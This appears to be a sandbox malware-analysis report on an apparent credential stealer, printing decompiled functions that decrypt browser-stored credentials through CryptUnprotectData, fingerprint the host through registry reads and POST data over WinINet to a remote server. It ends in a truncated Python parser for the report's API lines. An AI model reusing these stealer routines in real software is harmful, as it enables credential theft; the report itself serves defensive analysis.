                                          					_t322 = LoadLibraryA(E004039E8( &_v52)); // executed
                                          					_t326 = _t322;
                                          				}
                                          				_v20 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0xc]));
                                          				_v24 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x1a]));
                                          				_v28 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x2b]));
                                          				_v32 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x3c]));
                                          				_v36 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x53]));
                                          				_v40 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x64]));
                                          				_t375 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x75]));
                                          				_v44 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x89]));
                                          				_v48 = GetProcAddress(_t326,  &((E004039E8( &_v52))[0x9b]));
                                          				E00404F5C();
                                          				E00404F5C();
                                          				E00404F5C();
                                          				E00404F5C();
                                          				E00404F5C();
                                          				E00404F5C();
                                          				E00404F5C();
                                          				 *_t373 = 0x3c;
                                          				 *((intOrPtr*)(_t373 + 4)) =  &_v132;
                                          				 *((intOrPtr*)(_t373 + 8)) = 0x20;
                                          				 *(_t373 + 0x10) =  &_v388;
                                          				 *((intOrPtr*)(_t373 + 0x14)) = 0x100;
                                          				 *((intOrPtr*)(_t373 + 0x1c)) =  &_v516;
                                          				 *((intOrPtr*)(_t373 + 0x20)) = 0x80;
                                          				 *((intOrPtr*)(_t373 + 0x24)) =  &_v644;
                                          				 *((intOrPtr*)(_t373 + 0x28)) = 0x80;
                                          				 *(_t373 + 0x2c) =  &_v2692;
                                          				 *((intOrPtr*)(_t373 + 0x30)) = 0x800;
                                          				 *((intOrPtr*)(_t373 + 0x34)) =  &_v3716;
                                          				 *((intOrPtr*)(_t373 + 0x38)) = 0x400;
                                          				_t223 = E00403790(_v56);
                                          				InternetCrackUrlA(E00403990(_v56), _t223, 0x90000000, _t373);
                                          				E004036DC( &_v100,  *(_t373 + 0x10));
                                          				E004039F0(_v100, 4, E00403790(_v100) - 3,  &_v69416);
                                          				if(E00403AD4(0x418374, _v69416) != 0) {
                                          					_v73 = 1;
                                          					E004036DC( &_v69420,  *(_t373 + 0x10));
                                          					E004037DC( &_v88, _v69420, "Host: ");
                                          					E00417668(_v100, _t326,  &_v69424, _t373, _t375);
                                          					 *(_t373 + 0x10) = E00403990(_v69424);
                                          				}
                                          				_t327 = InternetOpenA("Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)", 0, 0, 0, 0);
                                          				if(_t327 != 0) {
                                          					_v84 = 0x2dc6c0;
                                          					_v48(_t327, 6,  &_v84, 4);
                                          					_v48(_t327, 5,  &_v84, 4);
                                          					_v64 = InternetConnectA(_t327,  *(_t373 + 0x10),  *(_t373 + 0x18), 0, 0, 3, 0, 0);
                                          					if(_v64 != 0) {
                                          						_v80 = 0x84003300;
                                          						E004036DC( &_v69428,  *((intOrPtr*)(_t373 + 4)));
                                          						if(E00403AD4(0x4183c8, _v69428) != 0) {
                                          							_v80 = _v80 | 0x00800000;
                                          						}
                                          						_v68 = HttpOpenRequestA(_v64, E00403990(_v16),  *(_t373 + 0x2c), 0, 0, 0, _v80, 0);
                                          						if(_v68 != 0) {
                                          							if(_v73 != 0) {
                                          								_v32(_v68, E00403990(_v88), E00403790(_v88), 0xa0000000);
                                          							}
                                          							_t290 = E00403790(_v12);
                                          							if(HttpSendRequestA(_v68, 0x4183cc, 0, E00403990(_v12), _t290) != 0) {
                                          								do {
                                          									E00404F5C();
                                          									_v72 = _v40(_v68,  &_v69412, 0x10064,  &_v60);
                                          									E004035D4( &_v96, _v60,  &_v69412);
                                          									_t304 = E00403798( &_v92, _v96);
                                          									asm("sbb eax, eax");
                                          								} while (_t304 + 1 != 0 && _v60 != 0);
                                          							}
                                          						}
                                          						 *_t375(_v68);
                                          					}
                                          					 *_t375(_v64);
                                          				}
                                          				 *_t375(_t327);
                                          				_t393 = _v92;
                                          				if(_t393 == 0) {
                                          					_push(_v100);
                                          					_push(_v12);
                                          					_push( *(_t373 + 0x18));
                                          					_push( &_v92);
                                          					E004036DC( &_v69432,  *(_t373 + 0x2c));
                                          					_push(_v69432);
                                          					E004036DC( &_v69436,  *(_t373 + 0x10));
                                          					_pop(_t362);
                                          					E00417820(_v69436, _t327, _v16, _t362, _t375);
                                          				}
                                          				E004038DC(_v16, 0x4182ac);
                                          				if(_t393 == 0) {
                                          					E0040627C(_v100, _t327,  &_v69440, _t375, _t393);
                                          					E004038DC(_v69440, "699F0FFD");
                                          				}
                                          				E00403538(_a4, _v92);
                                          				E004034E4( &_v92);
                                          				_pop(_t353);
                                          				 *[fs:eax] = _t353;
                                          				_push(E00418299);
                                          				E00403508( &_v69440, 7);
                                          				E00403508( &_v100, 4);
                                          				E00403508( &_v56, 2);
                                          				return E00403508( &_v16, 3);
                                          			}

                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000,00418292,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00417E0F
                                          • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418292,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00417E23
                                          • GetProcAddress.KERNEL32(00000000,-0000000C), ref: 00417E37
                                          • GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00417E4C
                                          • GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00417E61
                                          • GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00417E76
                                          • GetProcAddress.KERNEL32(00000000,-00000053), ref: 00417E8B
                                          • GetProcAddress.KERNEL32(00000000,-00000064), ref: 00417EA0
                                          • GetProcAddress.KERNEL32(00000000,-00000075), ref: 00417EB5
                                          • GetProcAddress.KERNEL32(00000000,-00000089), ref: 00417ECB
                                          • GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00417EE2
                                          • InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 00417FCE
                                          • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 0041805F
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 0041809F
                                          • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,?,?,00000000,00000000,00000000), ref: 004180FC
                                          • HttpSendRequestA.WININET(00000000,004183CC,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 0041814D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$Internet$HttpOpenRequest$ConnectCrackHandleLibraryLoadModuleSend
                                          • String ID: .bit$699F0FFD$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
                                          • API String ID: 3818312118-4094887192
                                          • Opcode ID: 5426785b2c93e71bb720d3844f0bf3b5d53ea999dd08074bdd8b235e38f763da
                                          • Instruction ID: 5b133b9addfad1444578419e9148cb156d847e9dbbf5ea098b4cdfe065b0ee4c
                                          • Opcode Fuzzy Hash: 5426785b2c93e71bb720d3844f0bf3b5d53ea999dd08074bdd8b235e38f763da
                                          • Instruction Fuzzy Hash: 01E10FB1900218ABDB10EFA5CC46FDEBBB8BF48305F10457AF504B7691DB78AA45CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00406BD8(void* __eax) {
                                          				char _v516;
                                          				int _v520;
                                          				void* _v524;
                                          				long _t13;
                                          				long _t19;
                                          				long _t23;
                                          				void* _t26;
                                          
                                          				_t26 = __eax;
                                          				_v520 = 0x100;
                                          				E00403C18(__eax, 0x406c70);
                                          				_t13 = RegCreateKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0, 0, 0x20019, 0,  &_v524, 0); // executed
                                          				if(_t13 == 0) {
                                          					_t19 = RegQueryValueExW(_v524, L"ProductName", 0, 0,  &_v516,  &_v520); // executed
                                          					if(_t19 == 0) {
                                          						E00403D6C(_t26, 0x100,  &_v516);
                                          					}
                                          					_t23 = RegCloseKey(_v524); // executed
                                          					return _t23;
                                          				}
                                          				return _t13;
                                          			}

                                          APIs
                                            • Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E
                                          • RegCreateKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000000,00000000,00020019,00000000,?,00000000,?,00406D40,00000000,00406E52), ref: 00406C1A
                                          • RegQueryValueExW.KERNELBASE(?,ProductName,00000000,00000000,?,?,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000), ref: 00406C3F
                                          • RegCloseKey.KERNELBASE(00000000,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 00406C60
                                          Strings
                                          • ProductName, xrefs: 00406C2E
                                          • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00406C09
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocCloseCreateQueryStringValue
                                          • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                          • API String ID: 3260168215-1787575317
                                          • Opcode ID: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
                                          • Instruction ID: 11e12cba7479b8b01b9fafc70b7cecbc040d8651ce68523128cfa86d41fe4498
                                          • Opcode Fuzzy Hash: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
                                          • Instruction Fuzzy Hash: A4011E703843016BE310DA58CC81F4673E8EB48B04F104435B695EB2D0DAB4ED14975A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			// Resolves DPAPI's CryptUnprotectData at run time through LoadLibraryA/GetProcAddress,
                                          			// so the import never appears in the PE import table; the pointer is cached in the
                                          			// global at 0x41ca64. CryptUnprotectData is the API that undoes CryptProtectData, which
                                          			// Chromium-based browsers use to protect stored credentials, a standard stealer dependency.
                                          			E0040A6AA() {
                                          				void* _t1;
                                          				struct HINSTANCE__* _t2;
                                          				_Unknown_base(*)()* _t3;
                                          
                                          				 *0x41ca68 =  *0x41ca68 - 1;   // global counter at 0x41ca68 gates the resolution
                                          				if( *0x41ca68 < 0) {
                                          					_t2 = LoadLibraryA("crypt32.dll"); // executed
                                          					_t3 = GetProcAddress(_t2, "CryptUnprotectData");
                                          					 *0x41ca64 = _t3;   // cached function pointer; NULL here means resolution failed
                                          					return _t3;
                                          				}
                                          				return _t1;   // decompiler artifact: _t1 is never assigned on this path
                                          			}






                                          Line addresses: 0x0040a6ac, 0x0040a6b3, 0x0040a6bf, 0x0040a6c5, 0x0040a6ca, 0x00000000, 0x0040a6ca, 0x0040a6cf

                                          APIs
                                          • LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 0040A6BF
                                          • GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 0040A6C5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: CryptUnprotectData$crypt32.dll
                                          • API String ID: 2574300362-1827663648
                                          • Opcode ID: fe207437e2ee7f711cbc9e5ec82da5dd37473118ad2ff0c824763446b94a0930
                                          • Instruction ID: e6c421c79dddd478bde07d5489d503c1d4cc859a9cbe04b01679e24e10095fcf
                                          • Opcode Fuzzy Hash: fe207437e2ee7f711cbc9e5ec82da5dd37473118ad2ff0c824763446b94a0930
                                          • Instruction Fuzzy Hash: 49C08CF06A030056CA01EBB29D4A70833693B82B887180C3BB040B14E0D93E4010970F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407D02), ref: 00407CD5
                                          • FreeSid.ADVAPI32(00000000,00407D09), ref: 00407CFC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CheckFreeMembershipToken
                                          • String ID:
                                          • API String ID: 3914140973-0
                                          • Opcode ID: 684da7f1912ccf8d100af4d66f16fe37e0ade1452f73a65b9e57601f8946f401
                                          • Instruction ID: b2bf85b2e2b23abc2f4a0e5b7d3564ce2fd94028ae90e1c3f906036a39e7bd64
                                          • Opcode Fuzzy Hash: 684da7f1912ccf8d100af4d66f16fe37e0ade1452f73a65b9e57601f8946f401
                                          • Instruction Fuzzy Hash: 97216F75A48348BEE701CBA8CC45FAE77FCEB09704F4084B2F510E3291D375AA08875A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407D02), ref: 00407CD5
                                          • FreeSid.ADVAPI32(00000000,00407D09), ref: 00407CFC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: CheckFreeMembershipToken
                                          • String ID:
                                          • API String ID: 3914140973-0
                                          • Opcode ID: 3350cafe3f8cf2e0daa8d574530435bc3faf7afc8018acb51f9e67137038bbf3
                                          • Instruction ID: 07ef963ec0b68deb3fcaff7dc025a93d4964a205a3b7442176a44215fb39e405
                                          • Opcode Fuzzy Hash: 3350cafe3f8cf2e0daa8d574530435bc3faf7afc8018acb51f9e67137038bbf3
                                          • Instruction Fuzzy Hash: B6215E75A48248BEE701CBA8DC81FAE77F8EB09700F5085B2F510E36E1D375AA098759
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407DD2), ref: 00407D95
                                          • FreeSid.ADVAPI32(00000000,00407DD9), ref: 00407DCC
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AccountFreeLookup
                                          • String ID:
                                          • API String ID: 3905513331-0
                                          • Opcode ID: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
                                          • Instruction ID: 27b9dc68911105edb543898119344a1168ea53adb1432c2ff39c990f87532faf
                                          • Opcode Fuzzy Hash: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
                                          • Instruction Fuzzy Hash: 0E21B575A04209AFDB41CBA8DC51BEFB7F8EB08700F104466EA14E7290E775AA008BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 65%
                                          			// Same routine as E00406E6C (next listing), decoded from an entry point 4 bytes earlier;
                                          			// the first statement comes from those stray bytes and is not real logic.
                                          			// Reads one registry string value into the caller's string _a4: hKey in __eax
                                          			// (0x80000002 = HKEY_LOCAL_MACHINE per the APIs list), subkey in __edx, value name in __ecx.
                                          			// The subcall strings show the key is SOFTWARE\Microsoft\Cryptography, the key that holds
                                          			// MachineGuid; the value name itself is not recovered in the listing.
                                          			E00406E68(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
                                          				char _v8;
                                          				char _v12;
                                          				int _v16;
                                          				int _v20;
                                          				void* _v24;
                                          				char _v536;
                                          				void* _t18;
                                          				intOrPtr _t52;
                                          				void* _t56;
                                          
                                          				_t18 = __eax - 0x55000000;   // decompiler artifact of the misaligned entry
                                          				_v12 = __ecx;                // value name
                                          				_v8 = __edx;                 // subkey path
                                          				E00404150( &_v8);            // SysAllocStringLen wrappers (see the subcall lines below)
                                          				E00404150( &_v12);
                                          				_push(_t56);
                                          				_push(0x406f1f);
                                          				_push( *[fs:eax]);
                                          				 *[fs:eax] = _t56 + 0xfffffdec;   // installs an SEH frame (fs:[0]) around the registry calls
                                          				_v20 = 0xfe;                 // cbData in/out: 254-byte output buffer
                                          				_v536 = 0;
                                          				RegOpenKeyExW(_t18, E00403D98(_v8), 0, 0x20119,  &_v24); // executed; 0x20119 = KEY_READ | KEY_WOW64_64KEY
                                          				RegQueryValueExW(_v24, E00403D98(_v12), 0,  &_v16,  &_v536,  &_v20); // executed; neither return value is checked and the key handle is never closed here
                                          				E00403D6C(_a4, 0x100,  &_v536);   // writes the result into the caller's string _a4
                                          				_pop(_t52);
                                          				 *[fs:eax] = _t52;           // pops the SEH frame
                                          				_push(E00406F26);
                                          				return E00403BF4( &_v12, 2); // frees the two temporaries (SysFreeString subcall)
                                          			}












                                          Line addresses: 0x00406e68, 0x00406e76, 0x00406e79, 0x00406e81, 0x00406e89, 0x00406e90, 0x00406e91, 0x00406e96, 0x00406e99, 0x00406e9c, 0x00406ea3, 0x00406ec8, 0x00406eef, 0x00406eff, 0x00406f06, 0x00406f09, 0x00406f0c, 0x00406f1e

                                          APIs
                                            • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                          • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406EC8
                                          • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF
                                            • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: String$AllocFreeOpenQueryValue
                                          • String ID:
                                          • API String ID: 967375698-0
                                          • Opcode ID: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
                                          • Instruction ID: 95dba4e9abc9c412b13e6587c625634e660d61312d90d7235186b1c7fae4ad03
                                          • Opcode Fuzzy Hash: 75d402b96af35ef4be622c85e7f42c5874bf5a9438753516473e280561b1ff26
                                          • Instruction Fuzzy Hash: DB114970600209AFD700EF98D992ADEBBFCEF48704F4000B6B508E7291E774AB448BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 65%
                                          			// Clean decode of the registry-read helper: hKey in __eax (0x80000002 = HKEY_LOCAL_MACHINE
                                          			// per the APIs list), subkey path in __edx, value name in __ecx, result written to the
                                          			// caller's string _a4. Used for host fingerprinting: the same caller chain also reads
                                          			// ProductName from SOFTWARE\Microsoft\Windows NT\CurrentVersion (first listing above).
                                          			E00406E6C(void* __eax, void* __ebx, char __ecx, char __edx, intOrPtr _a4) {
                                          				char _v8;
                                          				char _v12;
                                          				int _v16;
                                          				int _v20;
                                          				void* _v24;
                                          				char _v536;
                                          				void* _t44;
                                          				intOrPtr _t51;
                                          				void* _t55;
                                          
                                          				_v12 = __ecx;                // value name
                                          				_v8 = __edx;                 // subkey path
                                          				_t44 = __eax;                // hKey
                                          				E00404150( &_v8);            // SysAllocStringLen wrappers (see the subcall lines below)
                                          				E00404150( &_v12);
                                          				_push(_t55);
                                          				_push(0x406f1f);
                                          				_push( *[fs:eax]);
                                          				 *[fs:eax] = _t55 + 0xfffffdec;   // installs an SEH frame (fs:[0]) around the registry calls
                                          				_v20 = 0xfe;                 // cbData in/out: 254-byte output buffer
                                          				_v536 = 0;
                                          				RegOpenKeyExW(_t44, E00403D98(_v8), 0, 0x20119,  &_v24); // executed; 0x20119 = KEY_READ | KEY_WOW64_64KEY, i.e. the 64-bit view even from a 32-bit process
                                          				RegQueryValueExW(_v24, E00403D98(_v12), 0,  &_v16,  &_v536,  &_v20); // executed; neither return value is checked and the key handle is never closed here
                                          				E00403D6C(_a4, 0x100,  &_v536);   // writes the result into the caller's string _a4
                                          				_pop(_t51);
                                          				 *[fs:eax] = _t51;           // pops the SEH frame
                                          				_push(E00406F26);
                                          				return E00403BF4( &_v12, 2); // frees the two temporaries (SysFreeString subcall)
                                          			}












                                          Line addresses: 0x00406e76, 0x00406e79, 0x00406e7c, 0x00406e81, 0x00406e89, 0x00406e90, 0x00406e91, 0x00406e96, 0x00406e99, 0x00406e9c, 0x00406ea3, 0x00406ec8, 0x00406eef, 0x00406eff, 0x00406f06, 0x00406f09, 0x00406f0c, 0x00406f1e

                                          APIs
                                            • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
                                          • RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406EC8
                                          • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF
                                            • Part of subcall function 00403BF4: SysFreeString.OLEAUT32(?), ref: 00403C07
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: String$AllocFreeOpenQueryValue
                                          • String ID:
                                          • API String ID: 967375698-0
                                          • Opcode ID: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
                                          • Instruction ID: d6839de15ce0d986496e2f56cedbfcdd5c795bc72117923b9a37f873fbd9eab1
                                          • Opcode Fuzzy Hash: 93ffc18aff940630c773c39f869c9b73eb077ec6050040de7a5362879dcd2ece
                                          • Instruction Fuzzy Hash: E0111971640209AFD700EB99DD86EDEBBFCEF48704F5000B6B508E7291DB74AB448A65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			// Reserves an address range for a caller-supplied descriptor (__edx points to {base, size}):
                                          			// the size is rounded up to a 64 KiB multiple with a 1 MiB floor, the range is reserved with
                                          			// MEM_RESERVE (0x2000) and PAGE_NOACCESS (1), and released with MEM_RELEASE (0x8000) if the
                                          			// bookkeeping in E0040123C rejects it. Nothing here is writable or executable, so this is
                                          			// memory-manager bookkeeping, not an injection staging buffer.
                                          			E00401388(void* __eax, void** __edx) {
                                          				void* _t3;
                                          				void** _t8;
                                          				void* _t11;
                                          				long _t14;
                                          
                                          				_t8 = __edx;
                                          				if(__eax >= 0x100000) {
                                          					_t14 = __eax + 0x0000ffff & 0xffff0000;   // round up to 64 KiB granularity
                                          				} else {
                                          					_t14 = 0x100000;                           // 1 MiB minimum
                                          				}
                                          				_t8[1] = _t14;                                 // descriptor.size
                                          				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed: MEM_RESERVE, PAGE_NOACCESS
                                          				_t11 = _t3;
                                          				 *_t8 = _t11;                                  // descriptor.base
                                          				if(_t11 != 0) {
                                          					_t3 = E0040123C(0x41c5d4, _t8);            // register the block in the list at 0x41c5d4
                                          					if(_t3 == 0) {
                                          						VirtualFree( *_t8, 0, 0x8000);         // MEM_RELEASE
                                          						 *_t8 = 0;
                                          						return 0;
                                          					}
                                          				}
                                          				return _t3;
                                          			}







                                          Line addresses: 0x0040138b, 0x00401395, 0x004013a4, 0x00401397, 0x00401397, 0x00401397, 0x004013aa, 0x004013b7, 0x004013bc, 0x004013be, 0x004013c2, 0x004013cb, 0x004013d2, 0x004013de, 0x004013e5, 0x00000000, 0x004013e5, 0x004013d2, 0x004013ea

                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.938071568.0000000000400000.00000002.00000001.sdmp
                                          • Associated: 00000007.00000002.938247531.000000000041B000.00000004.00000001.sdmp
                                          • Associated: 00000007.00000002.938291129.000000000041E000.00000002.00000001.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Virtual$AllocFree
                                          • String ID:
                                          • API String ID: 2087232378-0
                                          • Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                                          • Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
                                          • Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
                                          • Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299
                                          Uniqueness

                                          Uniqueness Score: -1.00%
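Listings like the ones above are quicker to read once the raw constants in the APIs lines are decoded and the stack residue is trimmed: 0x80000002 is HKEY_LOCAL_MACHINE, 0x20119 is KEY_READ | KEY_WOW64_64KEY, 0x2000 with 0x1 on VirtualAlloc is MEM_RESERVE with PAGE_NOACCESS, and any values printed past an API's documented parameter count are adjacent stack slots (return addresses such as 00401691 and 00407D02), not arguments. The following is an added example, not part of the Joe Sandbox report or of the sample: a parser for the report's APIs line format, decoders for the registry and virtual-memory flags, and a rule that flags the host-fingerprinting plus run-time DPAPI combination seen in these functions. The sample lines are copied from the blocks above, the parameter counts come from the Win32 documentation, and the indicator rule itself is my own choice, not something the report states.

```python
import re
from typing import Callable, Dict, List, NamedTuple, Union

Arg = Union[int, str]  # 8-hex-digit values become int; "?" and string arguments stay str

class ApiCall(NamedTuple):
    api: str
    module: str
    args: List[Arg]
    ref: int
    subcall: bool  # line was marked "Part of subcall function ..."

# Constructed input for this example: APIs lines copied from the listings above.
SAMPLE_LINES = r"""
• LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 0040A6BF
• GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 0040A6C5
  • Part of subcall function 00404150: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E
• RegOpenKeyExW.KERNELBASE(80000002,00000000,00000000,00020119,?), ref: 00406EC8
• RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406EEF
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE
• GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D
• CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407D02), ref: 00407CD5
"""

API_LINE = re.compile(r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
                      r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEXWORD = re.compile(r"^[0-9A-Fa-f]{8}$")

# Documented parameter counts (Win32 reference); the sandbox prints further stack slots after these.
PARAM_COUNT = {"LoadLibraryA": 1, "GetProcAddress": 2, "RegOpenKeyExW": 5, "RegQueryValueExW": 6,
               "RegCloseKey": 1, "VirtualAlloc": 4, "VirtualFree": 3, "GetUserNameW": 2,
               "CheckTokenMembership": 3, "FreeSid": 1, "LookupAccountSidA": 7,
               "SysAllocStringLen": 2, "WideCharToMultiByte": 8}
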